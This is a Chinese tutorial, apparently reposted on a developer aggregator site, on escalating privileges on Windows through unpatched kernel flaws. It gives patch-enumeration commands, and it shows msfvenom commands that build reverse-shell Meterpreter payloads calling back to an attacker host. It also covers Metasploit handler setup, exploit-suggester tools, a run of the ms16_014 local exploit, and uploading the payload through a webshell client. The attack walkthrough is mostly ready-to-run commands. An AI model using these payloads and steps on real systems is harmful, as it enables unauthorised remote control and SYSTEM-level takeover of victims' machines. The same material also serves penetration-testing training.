操作系统权限提升(三)之Windows系统内核溢出漏洞提权

news2024/9/29 19:26:47

系列文章

操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!!

Windows系统内核溢出漏洞提权介绍

溢出提权是指攻击者利用系统本身或系统中软件的漏洞来获取 Windows操作系统System权限,其中溢出,提权又分为远程溢出和本地溢出。远程溢出需要与远程服务器建立连接,然后根据系统漏洞使用相应的溢出程序获取远程服务器的 Windows操作系统Systen权限。本地溢出是主流的提权方式,通常需要向服务器上传本地溢出程序,然后在服务器执行,如果系统存在漏洞,那么将会溢出获得 Windows操作系统System权限。

缓冲区提权步骤如下

(1)信息收集,例如查看当前权限,查看版本、补丁等
(2)根据收集到的信息确定可利用漏洞
(3)根据漏洞查找EXP
(4)使用EXP提权

获取目标主机的一个普通用户的shell后,执行如下命令,查看目标系统上安装了那些补丁

systeminfo
wmic qfe get caption,description,hotfixid,installedon

在这里插入图片描述
查看当前的权限

whoami /groups

在这里插入图片描述

常见补丁对应漏洞表

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

利用MSF提权

使用MSF提权必选先上线到MSF然后使用如下的插件进项提权扫描

> getsystem 提权 一般是将管理员提升到system
>  use post/windows/gather/enum_patches 
>  use post/multi/recon/local_exploit_suggester

1、上线到MSF

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.41.134 LPORT=3333 -f exe -o test.exe (32位)
msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp
LHOST=192.168.41.134 LPORT=3333 -f exe -o test.exe (64位)

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.41.134
set lport 3333
exploit

2、先使用自动提权getsystem,失败的机率很大

在这里插入图片描述
3、使用脚本检测可以利用的提权模块,速度可能有点慢,耐心等待

use post/multi/recon/local_exploit_suggester
set session ID
run

在这里插入图片描述
4、获得了可以用来利用提权的模块,使用对应的脚本然后进行提权即可

use exploit/windows/local/ms16_014_wmi_recv_notif
set session 2
run

在这里插入图片描述

windows exploit suggester提权

Windows-Exploit-Suggester是一款提权辅助工具,下载地址如下

https://github.com/GDSSecurity/Windows-Exploit-Suggester

它是用python开发而成,运行环境是python本,且必须安装xlrd 库其主要功能是通过比对systeminfo,生成的文件,从而发现系统是否存在未修复漏洞。

步骤如下:

1、下载软件
2、通过systeminfo > systeminfo.txt 生成txt文件
3、python2 -m pip install xlrd==1.2.0 安装库
4、python2 windows-exploit-suggester.py --update 更新库会生成xls文件
5、python2 windows-exploit-suggester.py --database xls文件名 --systeminfo
systeminfo.txt
6、对比信息查找漏洞

在这里插入图片描述
在这里插入图片描述在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
加粗样式我们得到了很多可以提取的漏洞

在线辅助提权

https://i.hacking8.com/tiquan
http://bugs.hacking8.com/tiquan/

1.打开网站
在这里插入图片描述

2.通过systeminfo > systeminfo.txt 生成txt文件

在这里插入图片描述3.复制文件内容,放入输入框
在这里插入图片描述
4.得到可以提权的漏洞模块

在这里插入图片描述

EXP如何搜索

我们现在已经知道了那些漏洞可以利用,那我们该如何去搜索这些可以利用漏洞的EXP呢

有如下三个网站可以供我们去利用

https://github.com/offensive-security/exploitdb
https://www.exploit-db.com
https://github.com/SecWiki/windows-kernel-exploits

在这里插入图片描述
我们可以根据所获得的提权漏洞的编号去下载对应的提权EXP进行利用

Windows系统内核溢出漏洞实战

现在控制了一台机器然后需要进行提权

EXP利用提权

1、查看当前用户权限,是apache权限需要提权

whoami
whoami /groups

在这里插入图片描述2、查看安装补丁情况,发现安装了两个补丁,我们查找EXP进行提权

systeminfo >systeminfo.txt

在这里插入图片描述3、将systeminfo.txt内容中的数据复制,输入补丁情况进行查询

https://i.hacking8.com/tiquan
http://bugs.hacking8.com/tiquan/

在这里插入图片描述
在这里插入图片描述
4、我们这里选择一个可以利用的EXP,下载对应的EXP利用模块

在这里插入图片描述

https://github.com/SecWiki/windows-kernel-exploits

在这里插入图片描述5、利用EXP执行提权命令在这里插入图片描述

MSF提权

1、查看当前用户权限,是apache权限需要提权

whoami
whoami /groups

在这里插入图片描述
2、上线到MSF

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp
LHOST=192.168.41.134 LPORT=3333 -f exe -o zs.exe

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.41.134
set lport 3333
exploit

在这里插入图片描述在这里插入图片描述

3、通过蚁剑上传恶意程序
在这里插入图片描述在这里插入图片描述

4、在目标机器上执行zs.exe

在这里插入图片描述
5、等待会话建立
在这里插入图片描述
6、执行命令,将会话放入后台

background

在这里插入图片描述

7、搜索提权的漏洞

use post/multi/recon/local_exploit_suggester
set session 5
run

在这里插入图片描述在这里插入图片描述

8、使用获得的提权漏洞所对应的模块

use exploit/windows/local/ms16_014_wmi_recv_notif
set session 5
run

在这里插入图片描述
9、查看当前权限

getuid

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/186190.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

五、环境的搭建

1、配置用户信息 以下操作是用终端模拟器Cmder,这个工具比较便捷,比如需要粘贴,点击一下鼠标右键就粘贴了。如果不想下载这个工具,也可以在终端操作(打开终端快捷键:Win R,输入cmd)。 (1)查看git 打开C…

Recast-Detour看这里就够了!

目录一、 Recast生成(一) 概述1. 简介(二) 生成过程1. 体素化2. 区域3. 轮廓4. 生成凸多边形5. 详细三角形(三) 配置1. 可配置参数2. 数据结构(四) 项目应用1. CS体系方案…

2023最新前端面试题3(持续更新)

46、HTML语义化 HTML 语义化就是让页面内容结构化,它有如下优点 1、易于用户阅读,样式丢失的时候能让页面呈现清晰的结构。 2、有利于 SEO,搜索引警根据标签来确定上下文和各个关键字的权重。 3、方便其他设备解析,如盲人阅读器根…

【Pytorch项目实战】之迁移学习:特征提取、微调、特征提取+微调、雾霾清除

文章目录迁移学习(Transfer Learning)方法一:特征提取(Feature Extraction)方法二:微调(Fine Tuning)(一)实战:基于特征提取的迁移学习&#xff0…

2023第三方应用苹果电脑磁盘读写工具Tuxera NTFS

今天,小编要来分享的是Mac下一款实用的NTFS读写软件——Tuxera NTFS,我们都知道OS X默认是不支持NTFS格式写入的,对于很多使用U盘或移动硬盘写操作的朋友来说非常的不便。而Tuxera NTFS很好的解决了这个问题。小子这次带来的是2023版本。 Tu…

kali入侵电脑

kali入侵电脑 注意:本文仅用于教学目的 1 kali制作exe控制电脑(msfvenom) kali是黑客常用的系统,里面集成了很多的攻击软件,这里我给大家演示一种使用kali制作.exe文件来控制自己电脑的方式。 msfvenom a Metasploit s…

Vue2 和Vue 3的区别

Vue 2 和 Vue 3的区别 1.双向数据绑定原理不同 Vue2 的双向数据绑定是利用ES5的一个APIObject.definePropert() 对数据进行劫持,结合发布订阅模式的方式来实现的。 Vue3 中使用ES6的Proxy API对数据代理。 Vue3 使用数据代理的优势有以下几点:1&#x…

深圳MES系统如何助力注塑企业实现数字化发展

家用电器、电子产品、日用品、医疗保健、汽车零部件、新能源以及建筑、玩具等行业对注塑制品需求量日益增长。注塑企业提供的各式各样注塑产品已深入到经济生活的各个领域,为国家经济的各个部门包括轻工业和重工业提供关键的支持。 现状 现在注塑企业的注塑机工作…

RTP协议基本分析(RTSP、WebRTC使用)

1、介绍 实时流传输协议(RTSP:Real Time Streaming Protocol)是一种网络传输协议,旨在发送低延迟流。 该协议由RealNetworks,Netscape和哥伦比亚大学的专家在1996年开发。它定义了应如何打包流中的数 据以进行传输。 …

【GD32F427开发板试用】INA226完成电流电压采集

本篇文章来自极术社区与兆易创新组织的GD32F427开发板评测活动,更多开发板试用活动请关注极术社区网站。作者:จุ๊บ冰语 前言 本次有幸参与并通过了极术社区组织的【GD32F427开发板试用】活动,让我对国产兆易创新的GD32处理器有了更深刻的…

Scala系列之:函数式编程

Scala系列之:函数式编程一、面向对象编程和函数式编程二、函数基本语法三、函数和方法的区别四、函数定义五、函数参数六、函数至简原则七、匿名函数一、面向对象编程和函数式编程 面向对象编程: 解决问题,分解对象,行为&#x…

【最新消息】苹果放出新大招??!!

各位开发者新年快乐,许久没有更新了,近期我收到反馈意思遇到苹果回复的新政策,不知道各位开发者有没有碰到过,我也会在下文提出我的猜测,要是有开发者也遇到了同样的问题,欢迎一起交流哦。 疑似新政策&…

【寒假每日一题】洛谷 P1088 [NOIP2004 普及组] 火星人

题目链接:P1088 [NOIP2004 普及组] 火星人 - 洛谷 | 计算机科学教育新生态 (luogu.com.cn) 题目描述 人类终于登上了火星的土地并且见到了神秘的火星人。人类和火星人都无法理解对方的语言,但是我们的科学家发明了一种用数字交流的方法。这种交流方法是…

vue-query 初探

vue-query,类似于vuex/pinia,以缓存为目的,但侧重的是对网络请求的缓存。 这是我预想的使用场景:假设在各个页面都需要发起相同的请求,去获取数据,而这种数据在一定时间内不会发生变化,那么这种…

【JavaWeb】带你走进Maven

文章目录1 什么是Maven?2 Maven 常用命令3 Maven 生命周期4 Maven 坐标详解5 IDEA 导入 Maven 项目1 什么是Maven? 如今我们构建一个项目需要用到很多第三方的类库,如写一个使用Spring的Web项目就需要引入大量的jar包。一个项目Jar包的数量之多往往让我们瞠目结舌…

线程execute()与submit()区别

线程池中有两个提交任务的方法 向线程池提交任务的两种方式大致如下: 方式一:调用execute()方法 方式二:调用submit()方法 一、区别 以上的submit()和execute()两类方法的区别在哪里呢?大致有以下三点: 1.二者所接收…

引入“ 自动化测试 ”都需要满足哪些条件?

📌 博客主页: 自动化软件测试 📌 专注于软件测试领域相关技术实践和思考,持续分享自动化软件测试开发干货知识! 📌 如果你也想学习软件测试,文末卡片有我的交流群,加入我们&#xff…

由浅入深,聊聊 LeakCanary 的那些事

引言 关于内存泄漏,Android 开发的小伙伴应该都再熟悉不过了,比如最常见的静态类间接持有了某个 Activity 对象,又比如某个组件库的订阅在页面销毁时没有及时清理等等,这些情况下多数时都会造成内存泄漏,从而对我们Ap…

linux内核-内存管理

linux内核内存管理 注意!内核空间和用户空间都是处于虚拟空间中 Linux的虚拟地址空间范围为0~4G,Linux内核将这4G字节的空间分为两部分 内核空间: 最高的1G字节(从虚拟地址0xC0000000到0xFFFFFFFF)&…

RTSP,RTP,RTCP协议

一 RTSP 1 简介 实时流传输协议,是一个应用层协议(TCP/IP网络体系中),它是一个多媒体播放控制协议,主要用来使用户在播放流媒体时可以像操作本地的影碟机一样进行控制,即可以对流媒体进行暂停/继续、后退和…